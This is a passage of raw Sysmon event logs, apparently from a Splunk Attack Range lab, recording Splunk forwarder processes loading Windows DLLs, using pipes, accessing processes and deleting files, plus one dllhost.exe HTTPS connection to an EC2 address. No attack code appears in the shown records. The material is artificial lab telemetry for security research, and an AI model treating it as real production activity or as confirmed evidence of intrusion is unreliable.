Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001606327Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606326Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base 
APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001606325Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606324Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606323Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606322Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606321Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x80000000000000001606320Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606319Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.577{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606318Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.564{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606317Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606316Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606315Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 
19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606314Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606313Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606312Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.561{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001606311Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.561{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606310Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.561{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1BCDBBC65BD9E590EE22C31DB4EDC5E,SHA256=7B3DF87164D3A2A6A46482B65DE37724F29116F1C0D15E6A9EC4CA97F4E8B9F6falsefalse - insufficient disk space 354300x80000000000000001095244Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:26.756{761B69BB-660F-6080-305D-00000000BA01}384C:\Windows\System32\dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1156-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x80000000000000001095243Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.587{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33D8CCE53265152D5EE4ABD008F7A0E9,SHA256=6624F11DA153E434E91F8C39C3A2F7676ED4AD3F600526AA95ACB413F3CDDAA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095242Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095241Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:31.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095240Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.120{761B69BB-8200-607D-A100-00000000BA01}4148NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095239Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.114{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81B3AA77FA4413BAAEF0FDFDEAD96635,SHA256=67246BD4B0CD2172B45887641E4DA523C0BDB61AB97772E813224FE79801BCC3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606309Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.345{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 
23542300x80000000000000001606308Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.345{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A992983BA1444CDA308205CE21378C5,SHA256=5DE711B233BFAC8906AC846969769A56FE8614704780255EBB4B12E90A9FE1F6falsefalse - insufficient disk space 534500x80000000000000001606307Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606306Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001606305Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}34525212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
WindowsValid 734700x80000000000000001606455Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606454Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606453Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606452Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 
Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606451Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606450Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606449Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606448Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 
(rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606447Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606446Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606445Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001606444Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:32.949{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606443Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606442Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606441Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 
734700x80000000000000001606440Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x80000000000000001606439Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606438Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606437Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.934{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606436Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606435Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606434Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606433Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program 
